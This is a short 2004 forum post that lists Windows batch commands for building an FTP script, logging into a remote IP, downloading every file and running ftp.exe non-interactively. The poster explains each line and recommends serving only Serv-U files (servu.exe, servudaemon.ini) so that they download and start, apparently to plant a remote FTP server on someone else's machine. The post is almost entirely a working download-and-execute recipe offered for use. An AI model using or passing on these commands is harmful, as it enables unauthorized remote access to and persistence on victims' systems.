Posted 09 October 2004 - 10:05 PM
here
echo open 123.123.123.123 port >k.txt
echo user k>>k.txt
echo k>>k.txt
echo mget *.* >>k.txt
echo quit>>k.txt
ftp -i -n -v -s:k.txt
1st line, connects to the ip with specified port
2nd line, enters username
3rd line, enters password
4th line, mass gets every file in the dir user 'k' is sent to
5th line, obvoiusly quits
6th line, executes ftp.exe connect/read ur k.txt connect and download
it's good to make the user that ur typing to be directed to a specific dir where only ur servu files are, e.g servu.exe servudaemon.ini
and it'll download then start them.